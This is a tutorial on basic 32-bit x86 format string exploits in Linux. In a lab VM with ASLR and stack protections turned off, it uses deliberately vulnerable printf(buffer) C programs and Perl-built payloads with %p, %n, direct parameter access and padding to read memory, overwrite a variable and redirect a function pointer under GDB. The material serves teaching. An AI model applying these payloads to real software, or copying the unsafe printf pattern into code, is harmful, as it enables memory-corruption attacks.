Basic x86-32bit Formatted String Exploits in Linux - Part 1

Oscar-Tark

Feb 28, 2020

CPOL

A basic formatted string exploit shows you how small errors in programming with the printf function can be a lethal weapon for hackers looking to compromise a system.

Introduction

Old-school x86 hacking techniques are almost obsolete thanks to the many security measures introduced since, but they still surface through programmer error, especially in the C programming language. Functions such as printf may seem innocent at first, yet they can open a big security hole if used incorrectly. In this article, we will focus solely on a 32-bit exploit on an x86 CPU, made possible by a programmer's misuse of the printf function.

For this article, you will need basic knowledge of:

C
GCC
GDB
Endianness concepts

This article is divided into two parts:

Part 1: Changing execution flow within our program
Part 2: Executing payloads in environment variables using destructors

Getting Started With Basics: printf(print formatted)

C provides the functions below, declared in the stdio.h header file, to print to the screen through standard output or to read a user's input from standard input:

printf(format string arg, args...)
scanf(format string arg, args...)

There are also printf and scanf variants that write to and read from a file, as shown below:

fprintf(file stream arg*, format string arg, args...)
fscanf(file stream arg*, format string arg, args...)

There are more variants of the scanf and printf functions, but for the purpose of this article we will focus solely on printf.

The printf function, which we will use in this exploit, is known as a variadic function. Variadic functions do not take a fixed number of parameters: we can pass as many arguments as we like, limited only by our computational resources.
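To make the idea of a variadic function concrete, here is a minimal sketch built on the standard stdarg.h macros. The function name sum_ints is made up for illustration. The point to notice is that the function cannot see how many arguments were really passed and has to trust its first parameter, much like printf trusts its format string.

```c
#include <stdarg.h>

/* Hypothetical example: adds up `count` int arguments.
 * Like printf, it cannot verify that `count` matches the number of
 * arguments the caller actually supplied. */
int sum_ints(int count, ...)
{
    va_list args;
    int total = 0;
    int i;

    va_start(args, count);
    for (i = 0; i < count; i++) {
        total += va_arg(args, int);  /* fetch the next argument as an int */
    }
    va_end(args);

    return total;
}
```

Calling sum_ints(3, 1, 2, 3) adds the three trailing values. Calling sum_ints(3, 1) would make the function fetch two arguments that were never passed, which is undefined behavior and the same kind of mistake that the rest of this article exploits.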

Further information about the printf and scanf functions is available in their manual pages (man 3 printf and man 3 scanf).

Getting Started With Basics: Basic Tools

Let's go ahead and setup our environment for conducting our exploit. In this article, we will be using the following tools:

GDB (GNU debugger)
GCC (GNU compiler collection)
Ubuntu 8.04.4 32-bit
Virtualization software such as VirtualBox

If you have not already done so, install Ubuntu in a virtual machine (VirtualBox is preferred, especially for users new to virtualization). The reason for using such an old version of Ubuntu is that most formatted string exploits have been left in the past. Modern operating systems ship with protection mechanisms such as ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention) that make memory-based attacks like this one much harder. Although still possible, running a formatted string exploit on a modern 64-bit system is incredibly tedious, which is why an older 32-bit system is preferable for a beginner.

Subsection - Issues in Ubuntu 8.04.4 - Install libc6-dev

After installing Ubuntu in VirtualBox, you will have to install libc6-dev, which contains the C headers required to compile our exploitable programs.

As this version of Ubuntu is outdated, you will have to install libc6-dev from your bootable CD/ISO image by setting the CD/ISO as a software package source. This is because APT (apt-get) cannot find or connect to most, if any, online repositories for this release, and updating the package lists for online sources does not help either. Of course, if you are a more advanced user, you may add known package repositories that still work with this version of Ubuntu.

Step 1: Virtual Box CD Mounting

To install libc6-dev from our original CD/ISO in Ubuntu, you will have to add your downloaded Ubuntu 8 ISO to the virtual machine's storage devices as an optical device in the VirtualBox settings.

First make sure that Ubuntu is shut down and not running in VirtualBox. Then open the Settings window of your newly installed Ubuntu 8 by highlighting the installation and clicking the cog button, as shown under my cursor (sorry for the Italian):

In the Settings window, go to the Storage option as highlighted on the far left of the current window:

Now you can mount the CD/ISO file by clicking on the little add CD button in the Controller IDE option of the Storage settings:

The Controller IDE option is shown below selected in Orange:

Step 2: Adding the mounted CD to our software sources in Ubuntu

After successfully adding our ISO as an IDE/CD device, we now need to add our CD to our Software sources in Ubuntu so that we can install libc6-dev onto our system.

To do so, open the System menu on the top panel, go to the Administration menu and then choose Software Sources, as shown below:

Now go to the Third-Party Software tab and check the CD-ROM option:

You may now close the window. Click Yes if upon closing a prompt asks you to reload or update your repositories. If not, you may update repositories to reflect those on the CD manually through the terminal by using:

sudo apt-get update

Step 3: Installing libc6-dev

You can now install libc6-dev using:

sudo apt-get install libc6-dev

Now that we have installed libc6-dev, we can successfully go ahead and write C code on our Ubuntu 8 installation and include all the basic headers we will need.

Getting Started with Basics: ASLR

As the first step towards our exploit, we must switch off memory randomization. Memory randomization (ASLR) helps protect programs against formatted string attacks and similar memory-based attacks such as buffer overflows. To switch it off manually, change the value in the following file from 2 to 0 (this requires root privileges):

/proc/sys/kernel/randomize_va_space

Getting Started With Basics: Format Specifiers

The first argument of printf is a string called the Format string parameter. It contains the character data you would like to output, along with special sequences called Specifiers. A Specifier begins with a % and, when evaluated, is replaced by the trailing arguments supplied to printf, in sequential order.

printf(format string arg, args...)

Here is a simple program containing a printf call whose format string contains the string Format specifier %s, which prints the trailing variable name as a string in place of %s:

//fmt_vuln.c:

#include <stdio.h>
#include <string.h>

int main()
{
   char name[1024];
   memcpy(name, "Jackson", 8);
   printf("My name is %s", name);
   return 0;
}

The above code will output the following:

My name is Jackson

Let's try a second example to fully understand how printf works:

//fmt_vuln.c:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main()
{
   char name[1024];
   int age = 23;
   memcpy(name, "Jackson", 8);
   printf("My name is %s, and I am %d years old", name, age);
   return 0;
}

This will output the following:

My name is Jackson, and I am 23 years old

As you can see, the format string is scanned for the %s and %d Format specifiers, which are then replaced, in order, by the trailing arguments supplied to printf.

Format specifiers come in many more forms than just %s and %d. Below is a list of some common Format specifiers:

(For a more in-depth treatment of Format specifiers, see the Wikipedia article on the printf format string.)

%s: Write a string
%d: Write a signed integer
%u: Write an unsigned integer
%x: Write an unsigned integer as hexadecimal
%n: Write nothing; instead, store the number of bytes written so far into the integer that the corresponding argument points to
%c: Write a character
%p: Write a pointer value (an address)
%lu: Write an unsigned long

As a programmer, always supplying your own constant Format string parameter to printf, rather than passing user-controlled data in its place, is crucial in order to dodge a formatted string exploit. We will see why in the next section.
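As a small illustration of that rule, the sketch below routes untrusted text through a constant "%s" format string. The helper name format_untrusted is an assumption made for this example, and snprintf is used instead of printf only so that the result lands in a buffer we can inspect.

```c
#include <stdio.h>

/* Hypothetical helper: formats untrusted text through a constant "%s"
 * format string, so any % sequences inside the text are copied literally
 * instead of being interpreted as Format specifiers.
 * Returns the number of characters the full result needs. */
int format_untrusted(char *out, size_t out_size, const char *untrusted)
{
    return snprintf(out, out_size, "%s", untrusted);
}
```

With this pattern, an input such as Jackson%p%n comes out exactly as typed, because the input is only ever data and never the format string.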

Exploitation: Reading Memory

Now let's use a modified version of fmt_vuln.c that outputs whatever is supplied to the program in its command-line arguments using printf. Compared to the previous program, this one calls printf "without" a Format string parameter of its own, so the user's input takes its place. It also makes a few other changes, such as using strcpy instead of memcpy:

printf(arg, args...)

//fmt_vuln.c:

#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[])
{
   char name[1024];
   strcpy(name, argv[1]);
   strcat(name, "\n");
   printf(name);
   return 0;
}

The above program outputs the second element of argv[], that is, argv[1]. We use strcpy to copy argv[1] into the string buffer name, append a newline with strcat, and then output the buffer to the screen using printf.

Note: argv[], also called the argument vector, contains all the arguments sent to our program on startup.

argv[0] : The first element is the name our program was invoked with.
argv[1,2...] : From the second element onwards, starting at argv[1], come the custom arguments sent to our program by either us or another program.

Let's go ahead and now compile our program using the following command:

gcc -g -fno-stack-protector -z execstack fmt_vuln.c -o fmt_vuln.out

We use a few flags in our compilation process to make our first exploitation of the binary easier. There are techniques that work without these flags, but we will use them this time as it is our first formatted string exploit. Generally, an attacker will not have access to the information and relaxed protections that these flags provide, as release builds of programs such as LibreOffice are not compiled this way; doing so would make abuse and information gathering far too easy.

Here is a simple breakdown of the flags that we have used:

-g: Generates debugging information. This allows us to see debug information about the executable in GDB, such as line numbers, C source code, etc.
-fno-stack-protector: Disables GCC's stack protector for the executable. With the protector enabled, a stack buffer overflow that corrupts the canary placed before the return address is detected when the function returns, and the program is aborted.
-z execstack: Passed on to the linker; marks the stack of our binary as executable, which turns off DEP (Data Execution Prevention) for it. With DEP off, we can execute payloads and arbitrary code that we write onto the stack using our exploit.
-o: Tells our compiler the output file name for our binary, including the extension; in our case we use the extension ".out".

Let's now run fmt_vuln.out with the parameter "Jackson" sent to argv[1] and view our output:

As we can see in the above image, we started the application with the argument “Jackson”. The printf function will still output our supplied argument. The only difference here is that this argument will be treated as the Format string parameter simply because it is the first argument sent to printf. Let's see what happens if we insert a %p after "Jackson":

As we know, %p outputs a pointer value, that is, an address. By supplying a badly written printf call with the %p Format specifier, we were able to print out a value from memory.

This value sits where printf expected to find its next argument. In this case, we as the user have been able to output actual memory contents by tricking printf into scanning memory for an argument that was never supplied.

Let's try scanning a few more memory locations by using more %p Format specifiers and see what we can find:

To create a parameter string with multiple %p Format specifiers easily, we use Perl to shorten the process. $() is Bash command substitution; you can also use backticks (``) to do the same (other shells may use different syntax; in this tutorial, we are using Bash). The command inside $() is executed first, and its output is then passed as the first argument to fmt_vuln.out:

AAAA%p->%p->%p->%p->%p->%p->%p->%p->%p->%p->

Perl has generated the string for us, which, as you can see, makes things less tedious. Scanning memory in bulk lets us see the various memory locations that printf reads its arguments from. The 5th value in the output of the execution above is 0x41414141, which is equivalent to AAAA in ASCII.

Exploitation: Direct Parameter Access

It's pretty clear now that we can read memory using the %p Format specifier. Generating the scan string with Perl inside $() is far simpler than typing out 10 %p Format specifiers in a row by hand, but there is a better way: we can directly access a specific parameter without having to scan through all of them each time.

Direct Parameter Access allows us to directly select a parameter by using the $ character in a Format specifier as such:

%8$p

Let's create a simple string using Perl and scan without Direct Parameter Access to find out where AAAA (0x41414141) is:

./fmt_vuln.out $(perl -e 'print "AAAA" . "%p" x 10')

As we can see in the above result, AAAA (0x41414141) is the 7th element. Let's select and output only 0x41414141, skipping the first 6 elements, by using Direct parameter access:

./fmt_vuln.out $(perl -e 'print "AAAA%7\$p"')

In the above command, we wrote \$ rather than a plain $ character. Inside a double-quoted Perl string, $ introduces a variable, so Perl would try to interpolate $p; the backslash makes Perl print a literal $ instead. The single quotes around the Perl code already stop Bash from touching it.

The same care is needed when the string is passed to fmt_vuln.out directly inside Bash double quotes, where $ also has a meaning (variable expansion and, with $(), command substitution). In simple terms, by escaping $ with a backslash, we make it an ordinary printed character that reaches argv[1] of fmt_vuln.out intact.

As we can see, we have selected 0x41414141 directly, without the hassle of outputting the 6 elements before it. This makes our life much easier, especially later on when we write to memory.
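Direct Parameter Access is also available to ordinary, well-behaved code. The sketch below uses it to print two arguments in swapped order. The helper name format_swapped is made up for this example, and the n$ syntax is a POSIX extension (supported by glibc) rather than part of ISO C, so treat it as an assumption about the platform.

```c
#include <stdio.h>

/* Hypothetical helper: writes `second` before `first` by selecting the
 * arguments by position with the POSIX n$ syntax.
 * %2$s picks the 2nd argument after the format string, %1$s the 1st. */
int format_swapped(char *out, size_t out_size,
                   const char *first, const char *second)
{
    return snprintf(out, out_size, "%2$s %1$s", first, second);
}
```

Passing "world" as first and "hello" as second yields the text hello world, which shows that the number before the $ selects the argument regardless of the order in which the Specifiers appear.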

Exploitation: Parameter Padding

Equally important as Direct Parameter Access is Parameter padding. This allows us to pad the values we output with printf to a specific width in characters. This can be done as follows:

%08p

As shown above, Parameter padding is introduced by placing an integer width right before the conversion character of our Format specifier (the leading 0 in this example is a flag that requests zeros instead of spaces as padding). This differs from Direct parameter access, where a $ symbol is needed. You may use Parameter padding in conjunction with Direct parameter access as shown below:

%7$12p

Let's run our program with an argument that uses both Direct parameter access and Parameter padding. This will output the 7th value (0x41414141) padded to a width of 12 characters:

./fmt_vuln.out "AAAA%7\$12p"

The output of the above command (result below) shows that the 7th value has been output with only 2 extra padding characters, which are highlighted in black by my cursor. Why aren't there 12 empty padding characters?

The value written by %p to standard output is a string of 10 characters, namely 0x41414141. The padding width includes the characters printed by the %p Format specifier itself:

Padding : (12 - 10) = 2

|--1--|--2--|------10-----|
  " " + " " + "0x41414141"

As a character array:

char p[12]
p[0] = ' '
p[1] = ' '
p[2] = '0'
p[3] = 'x'
p[4] = '4'
p[5] = '1'
p[6] = '4'
p[7] = '1'
p[8] = '4'
p[9] = '1'
p[10] = '4'
p[11] = '1'
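The same width arithmetic can be checked with a few lines of C. This is only a sketch: the helper name format_padded_hex is an assumption, and it uses %#x rather than %p because the exact text produced by %p is implementation-defined, while %#x always gives the 0x prefix followed by hexadecimal digits.

```c
#include <stdio.h>

/* Hypothetical helper: formats `value` as 0x-prefixed hexadecimal,
 * right-aligned in a field of at least `width` characters.
 * The * in the format takes the width from the argument list. */
int format_padded_hex(char *out, size_t out_size,
                      unsigned int value, int width)
{
    return snprintf(out, out_size, "%#*x", width, value);
}
```

With the value 0x41414141 and a width of 12, the result is two spaces followed by the 10 characters of 0x41414141. A width smaller than 10 changes nothing, because the width is a minimum and never truncates the value.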

Exploitation: Where Does printf Store Parameters Sent to It?

Now that we have learnt to read values using printf, let's figure out where these values are stored in actual memory. As shown below, each function call gets its own region of the stack called a 'Stack frame'. Stack frames are pushed on top of each other in LIFO (Last In, First Out) order so that the system can keep context (the frame of printf is pushed on top of the frame of main, and main only continues once the frame of printf has been popped from the stack). Remember that the stack grows from higher memory addresses towards lower memory addresses, while the heap does the exact opposite. On 32-bit x86, the caller pushes the function parameters onto the stack right before the call instruction pushes the return address, so the parameters sit just above the return address in memory:

Stack frame of printf() (lower memory addresses at the top)
|-------------------------------| ← Top of the stack, referenced by $esp
|   local variables of printf() |
|-------------------------------|
|   saved frame pointer         | ← Referenced by $ebp
|-------------------------------|
|   return address              |
|-------------------------------|
|   1 const char* format string | ← Arguments sent to printf()
|   2 argument 2                |
|   N arguments...              |
|-------------------------------|

Let's take another example, that of printf and main, which both appear in fmt_vuln.c. The Stack frame structure would be as follows:

<< Lower memory addresses

Stack frame of printf()
|-------------------------------| ← Top of the stack, referenced by $esp
|   local variables of printf() |
|-------------------------------|
|   saved frame pointer         | ← Referenced by $ebp
|-------------------------------|
|   return address to the "next |
|   instruction" in the main()  |
|   code section                |
|-------------------------------|
|   1 const char* format string | ← Arguments pushed by main() for printf()
|   2 argument 2                |
|   n arguments...              |
|-------------------------------|

Stack frame of main()
|-------------------------------|
|   local variables, including  | ← printf() keeps reading upwards into this
|   char name[1024]             |   area when the format string asks for more
|-------------------------------|   arguments than were actually passed
|   saved frame pointer         |
|-------------------------------|
|   return address              |
|-------------------------------|
|   int argc                    | ← Function arguments
|   char* argv[]                |
|-------------------------------|

Higher memory addresses >>

Exploitation: Writing to Memory

In the previous sections, we learnt how to read from memory, but how can we execute a payload if we can only read from memory? This is where the Format specifiers %n and %hn come in handy.

%n: Writes the number of characters output so far by printf into the int that the supplied pointer argument points to; an int is 4 bytes long on our system.
%hn: Does the same as %n, but writes a short, which is 2 bytes long on our system.

As we can see, the %n and %hn Format specifiers allow us to write to memory using a 4-byte or a 2-byte write, which comes in handy as 32-bit addresses are 4 bytes long.

In this article, we will experiment with the %n Format specifier in order to understand how writes work. Let's create the following program:

//fmt_vuln_w.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char* argv[])
{
  char buffer[1024];
  int a = 90;
  strcpy(buffer, argv[1]);
  printf("int a before: %d\n", a);  //Printf of the value of a before our write
  printf("Address of a: %p\n", &a); //Printf used in the correct way to print out a's address.
  printf(buffer);                   //Vulnerable Printf
  printf("\nint a after: %d\n", a); //Printf of the value of a after our write
  return 0;
}

In the program above, the integer a is created with the value 90. The goal of our exploit is to overwrite it with another value by using the %n Format specifier to write to the memory location of a. We start off by copying argv[1] into buffer using strcpy (using strcpy this way also opens up a buffer overflow vulnerability). To make our first exploit easier, the program prints out the address of a, which is not usually the case with a program that we would like to exploit. fmt_vuln_w.out then prints out buffer, which holds the value copied over from argv[1] and will contain our exploit string. Let's compile our program using the following flags:

-fno-stack-protector
-z execstack

Now we can run our program to find out the address of int a. fmt_vuln_w.out expects an argument in argv[1], so we can supply any value; let's use "ABCD". Supplying an argument prevents the Segmentation fault that would occur if strcpy tried to copy from a missing (NULL) argv[1] into buffer:

./fmt_vuln_w.out ABCD

The result is the following:

Subsection: Modifying int a's value:

In the previous execution above, we can see fmt_vuln_w.out has outputted the address of int a which is:

0xbffff080

So far, we haven't supplied an argument that takes advantage of our vulnerable printf call. As the title suggests, we want to modify the value of int a. The following will teach us everything we need to know about writing to memory using printf writes.

We can now add our address to the argument that will be sent to fmt_vuln_w.out on startup. It will then be copied into buffer, allowing us to write to the memory address of a (0xbffff080). Remember to write the bytes of the address in Little endian order, least significant byte first, when building the string:

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%p->"x10')

As you can see in the result above, the 9th value in our output is 0xbffff080, which is how printf displays the bytes \x80\xf0\xff\xbf that we supplied. As said before, this is because x86 stores the least significant byte first (Little endian), so the four bytes of our string are read back as the 32-bit value 0xbffff080.
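The byte order used in the Perl string can be reproduced with simple shifts and masks. This is a minimal sketch; pack_le32 is a hypothetical helper name, and the code does not depend on the byte order of the machine it runs on.

```c
#include <stdint.h>

/* Hypothetical helper: stores a 32-bit address into out[0..3] in
 * Little endian order, least significant byte first. */
void pack_le32(uint32_t address, unsigned char out[4])
{
    out[0] = (unsigned char)(address & 0xff);
    out[1] = (unsigned char)((address >> 8) & 0xff);
    out[2] = (unsigned char)((address >> 16) & 0xff);
    out[3] = (unsigned char)((address >> 24) & 0xff);
}
```

For the address 0xbffff080, the four bytes come out as 0x80, 0xf0, 0xff, 0xbf, which is exactly the \x80\xf0\xff\xbf sequence at the start of our argument.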

Let's now write to a. To do so, we will read from memory as before, and then use Parameter padding and Direct parameter access to select the correct printf argument position and write the correct value to a. Our target value for a is 34. We must remember that the Format specifier %n writes the number of bytes that printf has output so far. Let's start by changing the value of a from 90 to an arbitrary value:

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%7\$n"')

Strange, we haven't been able to change the value of a! Although printf has tried to write through our address, the stack layout may have changed: a shorter argv[1] changes how much data sits on the stack, which can shift both the address of a and the position of our string among printf's arguments. Let's go ahead and investigate again:

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%7\$n" . "%p" x 10')

As we can see, the address of a in our printf scan has shifted by 2 places, to the 9th position instead of the 7th. Let's retry our exploit by changing the Direct parameter access specifier to 9\$ instead of 7\$:

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%9\$n"')

Perfect, we have just written to a. Now we need to adjust the value of a to 34. By the time it reached %n, printf had output 4 characters, namely the bytes \x80\xf0\xff\xbf. These bytes show up in our output as a question mark symbol (they have no printable equivalent).

Remember that every escaped hexadecimal value such as \x80 is 1 byte. A char is also 1 byte, which means that so far we have output 4 bytes. %n itself is not counted in the number of bytes written, as it is silent: it writes to an address rather than to standard output.

\x80  ← 1 byte
\xf0  ← 1 byte
\xff  ← 1 byte
\xbf  ← 1 byte

So far we have output 4 bytes, so a's value is 4, and we need to raise it to 34. To do that, printf must output 34 bytes, that is, 34 characters, before it reaches %n. The question remains: how can we add those 30 bytes to the 4 we currently have? As discussed earlier in this article, we can use Parameter padding. This lets us request output of a specific width and so get printf to write more bytes than %p would on its own (on our 32-bit system, %p outputs at most 10 characters).

We must also remember that the padding width includes the characters that %p itself writes (the up to 10-character address that %p writes to standard output).

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%30p" . "%9\$n"')

With 30 bytes added through padding, int a finally contains our target value of 34.

We have now successfully completed a simple formatted string exploit in which we change the value of a program's variable.
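The counting rule behind this result, 4 bytes of prefix plus a field padded to 30 characters, can be verified with a well-formed use of %n, where we pass a valid int pointer ourselves. This is a sketch that assumes glibc on Linux (some C libraries restrict or disable %n); count_with_padding is a hypothetical name.

```c
#include <stdio.h>

/* Hypothetical helper: formats a 4-character prefix followed by one
 * field padded to `width` characters, then uses %n to record how many
 * characters had been produced at that point. */
int count_with_padding(int width)
{
    char out[128];
    int written = 0;

    /* "ABCD" stands in for the 4 address bytes; the empty string is
     * padded with spaces up to `width` characters. */
    snprintf(out, sizeof out, "ABCD%*s%n", width, "", &written);
    return written;
}
```

A width of 30 makes the recorded count 34, the same value we wrote into a. Here the pointer handed to %n is one we chose on purpose, whereas in the exploit it is an address smuggled in through the format string.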

Exploitation: Executing Arbitrary Functions

Modifying execution flow is one of the primary purposes of a formatted string exploit. So how do we change the execution of a program using one? First, we must understand that printf does not execute anything for us. If it did, that would be a large security hole by design. What we can do is use printf to write to the memory address where a function pointer is stored and so modify its value. Let's go ahead and create the following program:

//fmt_vuln_f.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void normal()
{
    printf("Execution continues as normal...\n");
    return;
}

void hacked()
{
    printf("Hacked\n");
    return;
}

int main(int argc, char* argv[])
{
    void (*call)();
    call = &normal;
    char buffer[1024];
    strcpy(buffer, argv[1]);
    printf(buffer);
    call();
    return 0;
}

As we can see in the above program, we have created a function pointer (call) that is assigned the address of normal and is then used to call it. Using printf, we can change the address stored in call, changing the execution flow so that the function hacked is called instead.

For this exploit, we will be using the GNU debugger, or GDB for short. This makes exploiting the program and understanding where things are in memory far easier than in a real-world scenario. Let's start fmt_vuln_f.out in GDB:

gdb -q ./fmt_vuln_f.out

The -q flag stands for quiet. It tells GDB to start without printing its introductory and copyright messages, such as version and license information. This helps in keeping our environment clean.

In this article, we will be using the Intel syntax in GDB, as I personally find it easier to read (GDB defaults to AT&T syntax; the command set disassembly-flavor intel switches to Intel syntax). There are two main syntaxes:

AT&T syntax
Intel syntax

Let's start our exploit. First, we must find out where the function pointer call stores its value, which will be the address of the function normal. To do that, we need to run the program and set a breakpoint in it so that we can inspect memory during execution. We can set a breakpoint using line numbers or even function names. Let's check the line number where the function pointer call is assigned the address of normal:

list main

As we can see, call is assigned at line 20. Breaking at line 20 would stop execution before the instruction that stores the address of normal into call has run. Let's set a breakpoint at line 21 instead, making sure that line 20 has executed:

break 21

Let's now run fmt_vuln_f.out with a junk value (AAAA), as the strcpy call needs a value to copy into buffer from argv[1]; otherwise an unnecessary Segmentation fault will occur:

run AAAA

Now that we have hit our breakpoint, let's find out the address where call stores the address of normal. We can do so by examining the pointer call with the examine command ('x') and viewing it as a hexadecimal word:

x/xw &call

Using & (address of) is not strictly necessary to find the stored value of call, since call is itself a pointer. Still, printing both the location of call itself and its stored value is the best way to go:

As we can see, the actual address of call is 0xbffff0fc, and the stored value of call, which is the address of the function normal, is 0x08048434. Let's check that this is correct by disassembling normal and viewing all of its instructions. call should point to the first instruction of normal:

disass normal

As we can see, the address of the first instruction of normal corresponds to the address stored in call. The address of normal can also be found using the program nm, which lists all the symbols within a binary. Let's find the addresses of hacked and normal using nm. Exit GDB, and type into the Bash terminal:

nm ./fmt_vuln_f.out

We can now find the addresses of both normal and hacked in the output, alongside those of other functions. It is now clear that:

call is stored at 0xbffff0fc
normal is stored at 0x08048434
hacked is stored at 0x08048448

Let's now change the value of call from the address of normal to that of hacked. We can use printf, the %n Format specifier, Parameter padding and Direct parameter access to do so. For this exploit, we will run the program inside GDB.

Note: It would be a good test of skills later on to exploit this program without using GDB. Remember that variable locations vary between plain execution and execution within GDB, although the differences are minimal. This is because GDB adds extra elements to our environment when it runs the program, shifting variables to different addresses.

Let's get started:

run $(perl -e 'print "\xfc\xf0\xff\xbf" . "%p->" x 10')

As we can see, our target address (that of call), 0xbffff0fc, is the 8th element. Let's go ahead and write to it using %n, setting 2 bytes of the target address at a time and hence splitting our write into two parts:

run $(perl -e 'print "\xfc\xf0\xff\xbf" . "%8\$n"')

As we can see, we have just changed the value of call to 0x4. This, as said before, is the number of bytes written so far. Let's go ahead and use Parameter padding to bring this up to 0x8448. As we are setting 2 bytes at a time, this first write takes care of the lower half of the address.

Let's find out how much padding we need in order to write 0x8448 with %n. In GDB, we can use the 'print' command (shortened version: p) to calculate the difference between the values 0x4 and 0x8448:

p 0x8448 - 0x4

As we can see, we would need 33860 characters' worth of padding. Next, we add a second address, 0xbffff0fe, to our program argument; it lies 2 bytes above our previous write target and will receive the second write. This adds 4 more characters to the output, for a total of 8 characters from the two addresses at the beginning of the string. This means that we need to remove 4 characters from our padding value:

33860 - 4 = 33856

Perfect, so our final padding value for writing to 0xbffff0fc is 33856. Let's go ahead and execute it:

run $(perl -e 'print "\xfc\xf0\xff\xbf\xfe\xf0\xff\xbf" . "%33856p" . "%8\$n"')
                                      |-4 bytes more-|

Executing the above gives us the right result for the first half of our write, as shown below. The program ends in a Segmentation fault, as 0x00008448 is not a valid address of executable code:

Perfect! Now that we have written half of our target address, let's go ahead and calculate the second half. The second half lives at 0xbffff0fe, 2 bytes above the first write at 0xbffff0fc. The upper half of the value sits at the higher address because x86 processors use Little endian, as discussed previously.

Little endian simply means that the Least significant byte of a value is stored first, at the lowest address, and the Most significant byte is stored last, hence it might seem that we are going in the opposite direction when reading memory. Byte order is architecture dependent; x86 processors use the Little endian format (some processors, such as ARM, can use both Big and Little endian, which is called Bi-endianness).
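To see which half of the target value belongs at which address, the split can be written out in C. This is a minimal sketch with a hypothetical helper name, split_halves; it only does the arithmetic and does not touch memory layout itself.

```c
#include <stdint.h>

/* Hypothetical helper: splits a 32-bit value into the 16-bit half that a
 * Little endian machine stores at the lower address (*low) and the half
 * it stores 2 bytes above that (*high). */
void split_halves(uint32_t value, uint16_t *low, uint16_t *high)
{
    *low = (uint16_t)(value & 0xffff);
    *high = (uint16_t)(value >> 16);
}
```

For the address of hacked, 0x08048448, the low half is 0x8448 and belongs at 0xbffff0fc, while the high half is 0x0804 and belongs at 0xbffff0fe.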

In order to write the second part of the address to 0xbffff0fe, let's figure out where that address is among printf's arguments, using Direct Parameter Access with the %p Format specifier:

run $(perl -e 'print "\xfc\xf0\xff\xbf\xfe\xf0\xff\xbf" . "%33856p" . "%8\$p" . "%p" . "%9\$p"')

Now hold on a minute! This looks very different from what we did before to scan memory, where we printed "%p->" ten times and so scanned 10 values from printf.

Why the change? We did not scan this time because the next parameter, in this case the 9th, is probably our target address. Rather than creating a scan string again, we can directly look for our target value in the next few parameters. This may not always work, and we might have to try the 10th or 11th position. Let's first confirm our hunch by reading the 9th parameter to see if it holds our second address:

run $(perl -e 'print "\xfc\xf0\xff\xbf\xfe\xf0\xff\xbf" . "%33856p" . "%8\$p" . "%p" . "%9\$p"')

As we can see above, our previous command outputs 4 values from memory that we have read using the %p Format specifier, and indeed the 9th parameter is 0xbffff0fe. We switched the previously used %n Specifiers to %p in the above command because a Segmentation fault would not be very helpful during our investigation: it would halt execution and thus halt our investigation.

Perfect! Let's construct the final parts of our exploit by calculating the remaining padding needed to write the second half of our target address. To do so, we change the 2nd and 4th Specifiers in the above command back to %n, which lets us write to the target again. This time, we will also be writing to the 2nd address, using the running total of everything output so far. The result will help us calculate our way to the correct second write value:

The result below shows us that the second half has been written with the value 0x8452:

Let's adjust it to the right value. As we can see, 0x8452 is larger than 0x0804. As the character count can only grow and we cannot subtract from it, we must add enough padding for the lower 2 bytes of the count to wrap around past the maximum value of 0xffff and start again from 0x0000.

After reaching 0x0000, or any value lower than our target 0x0804, we can add extra padding in order to count up. Let's calculate the padding needed to get to 0x0000:

As we can see in the above calculation, GDB reports -33874. A negative padding is not what we need for the wrap-around, but using 33874 as the padding of our third %p will still carry the count past 0xffff and into a more useful range for our second write. Let's go ahead and use that padding value:

As we can see below, our second write now amounts to 0x089a, which is lower than our previous write of 0x8452. This means that we have wrapped around 0xffff:

Although 0x089a is larger than 0x0804, we can adjust the padding value of our third %p parameter to write the right number of bytes, as it does not affect the first part of our address. Let's calculate the difference between 0x89a and 0x804. The result is the number of padding characters that we need to remove from our third %p parameter:

Perfect! This means that all we have to do is reduce our padding by 150 characters, which results in 33724:

And voilà, we have just changed the value of the call function pointer so that it calls hacked instead of normal, as we can see from the "Hacked" output.
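The trial-and-error arithmetic in this section can be condensed into one modular subtraction. The sketch below is an illustration only: padding_for is a hypothetical helper, and it assumes we only care about the low 16 bits of printf's running character count, as we did for each half of the address.

```c
/* Hypothetical helper: returns how many more characters must be printed
 * so that the low 16 bits of the running character count move from
 * `current` to `target`, wrapping past 0xffff when target < current.
 * Unsigned subtraction wraps around, and the mask keeps the low 16 bits. */
unsigned long padding_for(unsigned long current, unsigned long target)
{
    return (target - current) & 0xffffUL;
}
```

Starting from the 8 address bytes, padding_for(8, 0x8448) gives the 33856 used for the first half, and padding_for(0x8448, 0x0804) gives the 33724 used for the second half. One caveat: a width smaller than the natural length of the printed value (up to 10 characters for %p here) has no effect, so a very small result would need a further 65536 added to it.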

Conclusion

Creating a formatted string exploit requires just a bit of calculation and know-how. We have now successfully called an arbitrary function within our application by redirecting our execution flow from the normal function to the hacked function.

In part two, we will take a closer look at how to execute a payload from an environment variable using the same exploitation techniques.

History

28th February, 2020: Initial version